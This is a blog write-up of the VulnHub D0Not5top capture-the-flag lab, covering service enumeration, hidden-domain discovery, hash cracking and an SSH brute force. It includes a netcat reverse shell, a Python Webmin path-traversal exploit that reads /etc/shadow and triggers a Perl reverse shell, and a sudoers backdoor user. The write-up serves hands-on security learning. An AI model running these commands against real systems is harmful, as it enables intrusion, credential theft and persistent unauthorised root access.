Wednesday 26 April 2017

VulnHub -- D0Not5top -- Writeup

Trying not to stop with D0Not5top.. 
This was a wild ride indeed! Excellent fun 3mrgnc3, job well done indeed :)

Was playing this together with a couple of THS buds and we were having a blast at being frustrated to high hell and back by this thing.. never did get all flags, but the path to root was a fun one and will look forward to seeing how others managed to get what we did not.

There are 2 IPs used in the below examples for the VM as I was switching between host-only and bridged.

Initial enumeration
Started off with the usual scans;
> Host discovery
> Port scanning
> Open port services checks
> Forced browsing
> Website source info gathering

Host discovery

Port scanning
nmap -p-

So we have some ports to look at; ssh smtp & http stand out as good ones to focus on (I'll admit I went digging at the rpc ports when all else was looking a tad bleak.. lol).

Port 22 SSH 
I decide to wait with further checks on SSH until more enumeration done and possible usernames have been enumerated. More on this later...

Port 25 SMTP 
Doing a banner grab on the smtp port gives us an interesting string;
nc 25

Decoding with xxd gives us another flag! yay!
echo "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874 327231646434 717070756 5793437 347 3767879610a" | xxd -r -ps

Hrmmph.. flag 3.. missed a couple.. search continues.

Port 80 HTTP 
Oh dear Xenu, the leetspeek continues...

Nothing in the source of the page root, so time to bust out nikto to have a closer look at what might be lurking;
nikto -h

after an initial AHAH! WordPress! moment of joy, happiness quickly turns to disappointment when it becomes apparent that the wordpress references are all blank page tr0lls.. bah..

Checking the robots.txt we see some interesting information at the bottom of the robots.txt;

# terminal knows where to go.
User-agent: GameTerminal

Alrighty then.. so terminal knows where to go and User-Agent is GameTerminal..
Tried with setting the user agent to GameTerminal for shits and giggles, but that did not aid in any process.

OK, next step to have a see if forced browsing can reveal any 'hidden' pages;

Forced Browsing
Running dirb (dirb gives a lot of hits and so I switch to wfuzz to be able to better sort the output.
wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404

Still a lot of hits with a lot of empty pages.. but changing the syntax just a tad to only show html 200 codes and be recursive down to 3 directories gives a clearer view of none-empty pages ;
wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200

We find a page in the /control/ directory in which a 'DNS Control Panel' is illustrated.
MegustaAdmin is shown to be logged in, so note this as possible username.
Going through the page sources of the found /control page shows and we have another flag!

Going down a bit further and we have some text;
<!-- M3gusta said he hasn't had time to get this w0rKING.
Don't think he's quite in the 20n3 these days since his MadBro made that 7r4n5f3r, Just Couldnt H@cxk Da D0Not5topMe.ctf --!> 

Another possible username noted and looking further we find that the directory /control/js/ is listable and see a README.MadBro file lurking..;
# MadBro MadBro MadBro MadBro MadBro MadBro MadBro MadBro #
# M4K3 5UR3 2 S3TUP Y0UR /3TC/H05T5 N3XT T1M3 L0053R...   #
# 1T'5 D0Not5topMe.ctf !!!!                               #
# 1M 00T4 H33R..                                          #
# MadBro MadBro MadBro MadBro MadBro MadBro MadBro MadBro #


Aha! So we need to edit the hosts file and include the domain D0Not5topMe with domain extension .ctf AND we have found flag #2!
This string is partially binary, which when decoded to decimal equates to;
Or if we take the 2nd part 6 chars at a time;
Either way, it doesnt seem to hint at anything else.
These strings underneath the partial binary appear to be Crypt16 hashes, but after trying all sorts of various string alterations and decodings, did not dig further on this.

Checking domains
OK, so after editing the /etc/hosts file to include D0Not5topMe.ctf  and pointing our browser to that domain, we are presented with a board / forum named "Worka Suko Gameo Di Besto"

Further description of the forum appears to be Pig Latin;
"emay ayingplay uchmay amesgay ownay egistrarioray arnay edsay emay emailway ayay egustomay otay indfay away eomay ideyhohay"
Which, as far as google can tell me, translates roughly to;
"me playing much games now registrario rna sed me wemail a megusto to find wa meo hideyho"
OK, so it appears it is advising to register to the board and send an email to megusto to find out where he is hiding...

Further we can see that Megusta is the only current member of the board and trying to login with;
username: megusta
password: megusta
gives us a response of incorrect password.
Trying to login with;
username: m3gu5t4
password: m3gu5t4
gives us a response of incorrect username, so we can enumerate the username, but was not able to do more than that.

After registering an account (needed to be online for that, hence the bridged IP) we are able to add Megusta as a friend, further confirming the valid username, however I couldn't figure out how to send a message to Megusta which is what I think the PigLatin translation is advising to do..  ¯\_(ツ)_/¯

Spent a lot of time on the User Control Panel as it seemed the right place to be for an SQLi, LFI or RFI... but I now have a feeling it was one big tr0ll.. oh les tr0lls..

When forcing an error with an attempted sql injection (http://d0not5topme.ctf/ucp.php?sid=0ea605a35c24e11610ecc7ee1aebe621&i=%27%20or%20%271=%271) we get a response mentioning an email address for Megusta; Megusta@g4m35.ctf

Spent too long trying to use this information to see how it may help in sending a message to dear old Megusta.. however to no avail.

So is it another valid new domain? Entered in hosts file and fired it up in browser.. Oh yeah!

This turns out to be a stress / fury / homicidal tendancy inducing 3d missile game.. which I have found I am very, very bad at..
I had a shot (ha) at trying to hack the game to see if anything appears at the end, as it must have a hint somewhere.. but failed miserably..

Then luckily chron1cl3 came to the rescue who had come up with a nice novel way of testing domains with possible domains based on enumerated names and leetified strings from the hints in robots.txt and had found another domain!

Comparing the response sizes from a curl --header Host request, we can see whether responses are new domains or non-existing domains which revert back to the webroot;
curl -s --header "Host: test.ctf"

Using this and knowing that .ctf is a valid domain extension, we can do a rudimentary scan of possible domains with curl;
for i in $(cat leet.txt);do echo -ne "$i -- " && curl -s --header "Host: $i.ctf" | wc -c ; done

t3rm1n4l.ctf has a different response size and appears to be a valid domain, so lets enter it in hosts file and see what we're looking at.

Mkay. A terminal emulator requiring some form of authentication.
After a lot of trial and error found the correct Passwordo: t3rm1n4l.ctf

Checking what commands the terminal emulator accepts shows that this is very limited, after going through numerous checks and getting rather frustrated with the constant renewed login requirement (omg 3mrgnc3.. teh tr0lls..) Pimp chron1cl3 found that grep worked and was able to do a file / dir listing with grep *

Oooh yeeeah...

So checking this new domain M36u574.ctf with the curl --header Host method, we see that the response is different from the webroot, so looks like another new domain!
curl -s --header "Host: M36u574.ctf" | wc -c

Entering the new domain into our hosts file and viewing in browser, we are presented with a load of megusta memes on rotation stretching the full size of the browser for Meg's beauty's sake..

I wanted to grab all pics and the directory wasn't listable, so to ensure I didnt miss anything I fired up OWASP ZAP and switched the proxy on in the browser.(I use Proxy Switcher add-on in the browser)

After loading up the M36u574.ctf site and letting it run for a bit, I had all the images and proceeded to download the raw body of the response from ZAP for further analysis.

Some quick checks on the image files with file, exiftool & hd shows that kingmegusta.jpg is of interest as there appears to be some base64 in the image comment.
for i in $(ls *.raw); do echo ; exiftool $i ; done

For the sake of covering our bases I also ran a quick check on the footers of the files to see if anything pasted on the end of the files or anything out of the ordinary, besides padding and an actual png file insead of a jpeg nothing noteworthy found.
for i in $(ls *.raw) ; do echo $i; hd $i | tail -n10; done

So back to the suspected base64 in the comment of kingmegusta..
exiftool -comment kingmegusta.raw | sed 's/^.*: //' | base64 -d

ooohhh yeaaah... hash FTW!

Lets see if my crappy 590GTX still works with hashcat on my windows box, I copy the hash to file hash.txt and let hashcat rip on the sha512 hash using the rockyou wordlist; 
hashcat64.exe -m 1800 -a 0 -w 1 hash.txt rockyou,.txt

So user:password obtained;


SSH Fun / tr0lls.. 
Alright, but now we have what appear to be valid credentials in our hand! Shell seems within our grasp at last!

Let's try our shiny new credentials on an ssh login;
ssh MeGustaKing@

What the... argh..
Pfff...more tr0lls... hahaha... this guy..

Well there seems to be an encoded string at the top, however try as I might, I could not decode the fucker. Later it turned out that there was actually a typo in it and that the correct string was;

Decoding this twice with base64 results in flag number 6 (where the hell # 4 & 5 are hiding... I dunno lol, but possibly in the g4m35.ctf domain)

Moving on down the information in the ssh screen there is a mention of a last login from R0cKy0U.7x7, this seems a fairly obvious reference to the rockyou.txt wordlist (but last login also mentioned as being on 01-04-2017.. April fools' day..oh lordy)
Also, there seems to be some alarm that the user logging in is not "burtieo" who apparently is the 54wltyD4w6..

Well armed with a new username and a clear reference to the rockyou wordlist, we fire up hydra and let her do her worst on an ssh bruteforce attack. (well OK, chron1cl3 did this :P  nice going dude :D)
Running a bruteforce attack on an ssh login is a slow and painful process and truly the only thing you can hope for is a good hint on the password or at least a smallish, focussed wordlist.
In this case the rockyou reference is pretty clear, so just have to let it run for as long as I can keep the PC on and see how far we get..;

hydra -l burtieo -P lists/rockyou.txt -e nsr ssh

OK, so actually this was yet another tr0ll.. haha, the actual password was written right in the login screen...

But no matter, now we have another set of shiny new credentials! Yay! or do we.. on initial logging in, all seems fine, but then..
ssh burtieo@

gah, its an rbash restricted shell..and try though I might, I was not able to easily escape this one..

SSH can allow user code execution, which in this case can bypass some of the restrictions, although still not making it terribly user friendly. We can test this with;
ssh burtieo@ cat /etc/passwd

OK, good that works, lets see if we can turn this into a simple shell for ease of use;

Start up a netcat listener and then start the ssh command calling a netcat connect command,
spawn a clearer shell, set environment and get busy :D

ssh burtieo@ nc 4444 -e /bin/sh
enter burtieo's password
python -c 'import pty; pty.spawn("/bin/sh")'
export TERM=linux

Ahh, this is better! Looks like we are good to go and get on with further enumeration of the box.

I change to writable directory /tmp and after checking that wget is installed, start apache2 on the attacking machine, host an enumeration script and then download and run it on the victim;

cd /tmp 
which wget 
wget -q
bash > enum.txt

Reading through the enumeration script results.. something immediately caught my eye..

To quote chron1cl3; "oh shizzle!" :D
We can run a file as root, must be getting close now..

When running the /usr/bin/wmstrt file, it counts down from 20 to 0 and then prints;

We figured 10 kilo must be 10k / 10000, so ran a quick nmap scan during the 20 seconds of countdown time when running the wmstrt file with sudo;
nmap -p 10000 -sV

I was having real trouble with the browser not accepting the certificate and for all the googling on it the only solution I came across was downgrading the browser.. I was basically more or less giving up on it, but this is where some serious pimpness came into play in the form of He Who Shall Not Be Named.. otherwise known as ch3rn0byl..

ch3rn whipped up a python script (dont you hate/love it when people just quickly do that while they're sitting on the john doing a crossword puzzle or some shit) which ignores SSL certificate verification and does a path traversal to be able to read files outside the web root directory.. in a few short lines...
I've gotta loosen up with my bash love and get on this python bandwagon..
import requests
payload = '/..%01' * 10
payload += '/etc/shadow'
r = requests.get('{}'.format(payload), verify=False)
print r.url, r.status_code, r.reason, r.content
So we run the /usr/bin/wmstrt file with sudo to open up the webmin port 10000 and then run ch3rn's pimpscript;

Success! For shits and giggles I grabbed the root hash and ran hashcat on it using rockyou wordlist.
hashcat64.exe -m 1800 -a 0 -w 1 hash.txt rockyou.txt

no way.. really? More creds!

In the 1st version, root was allowed to login over ssh, that made access ezpz, but it was clear this was not the author's intended route and in the revised VM the root login capability has been removed.

I was sure (and so was ch3rn..) that his pimpscript could be used to leverage a file to run as root and considering we had write access to /tmp, I wanted to create a reverse shell and then have it phone home after having been called by root. and thus give that sweet rootshell..

My brain was frazzled, but ch3rnobyl came through again with some awesome tidbits on webmin. Well tidbits.. I'm not too proud to avoid admitting there was a fairly pretty spoon involved.. :P
so roughly, and this part will need some serious improvement when I get my game together on this, webmin is based off perl and runs perl modules. So creating a perl module (editing extension from .pl to .cgi) and making it executable will allow us to execute that file if able to be called/reached by path traversal via the webmin service.

So first we prepare a perl reverse shell;
edit the IP and PORT to our setup and then host on our attacking system.

Download to our target system in the writable /tmp/ directory, rename extension (I renamed the shell revshell.cgi) and make executable with chmod +x.
cd /tmp
wget -q
mv revshell.cgi
chmod +x revshell.cgi

We edit the pimpscript to call the correct file. as there is no need to read the content or the like, we can delete some of the printed items, so I just left the url and status_code to be printed.
import requests
payload = '/..%01' * 4
payload += '/tmp/revshell.cgi'
r = requests.get('{}'.format(payload), verify=False)
print r.url, r.status_code
Start a netcat listener on the attacker, run webmin file /usr/bin/wmstrt with sudo again and in the 20 seconds run the pimpscript to call the perl reverse shell..



So this is a pretty round-about way to get to root, so lets get another user in the mix straight away with root privs so we can finally get a normal friggin root shell;

useradd -u 12345 -g root -s /bin/bash -p $(echo epat | openssl  passwd -1 -stdin) tape
echo "tape ALL=(ALL:ALL) NOPASSWD:ALL" >> /etc/sudoers

Now we can login with ssh and do a sudo su to get root privs, nice and ez!
ssh tape@ 

sudo su

So now we've got nice an ez root access, Im gonna enumerate the bejeezus outta the g4m35.ctf domain and see if I can find flag 4 & 5  :P  but for a wee moment.. enough time spent on this and time for some THS R&R! :P

Think Chron1cl3 has pwned flag7, will update as and when progress is made ;)

Big up to the THS crew and those participating in one way or another on this awesome VM
Chron1cl3 --

And of course many thanks to 3mrgnc3 for this great (and frustrating.. grr) ride and thanks to VulnHub for hosting these awesome VMs.


  1. Awesome write-up. I'm really glad you enjoyed it.
    It's a shame you didn't find the second racing game. I'm sure you would have had a blast with it.

    p.s. you can use Burp/ZAP proxy to get around the ssl cert acceptance issue. I left it in as part of the challenge. But tbh, the solution ch3rn0byl came up with was way cooler :D



    1. Hey man, it is a really..really cool VM and had us all guessing multiple times on each step haha! The amount of work you must have put in it is impressive.
      chr0nicl3 got by the certificate issue with burp too and now of course I will have to go that route some time again too.
      This is one I will come back to for sure to just remind myself how awesome it is.
      (and to find this 2nd game ?!!)

  2. I see your pictures are blocked with "". Any ideas on what is going on with the spam?

    1. Hey man, yeah.. photobucket screwed me over and after all these years of using it to host pics it is now insisting I upgrade to an expensive plan to get 3rd party hosting back..

      Unfortunately not gonna happen

  3. Hi!

    Great writeup! I'm learning a lot from you.

    Could you elaborate how FL101110 translates to FL46? AFAI understand it's FL and two binary numbers: 101 and 110. While 110 is really 6, 101 is 5 in decimal. What am I missing?

    1. Howdy anon, glad you liked the post and kudos for sticking to it despite the lack of images.. sorry about that :(

      Do a search for a Binary to Decimal converter and then enter: 101110
      You will see it results in 46.

      We have seen that the way the VM author spells FLAG == FL46, so thats what we were looking for.

  4. hey TAPE, awesome writeup.
    i am lil confuse about how you have access D0Not5topMe.ctf and what entries have made into etc/hosts file.


Google Analytics Alternative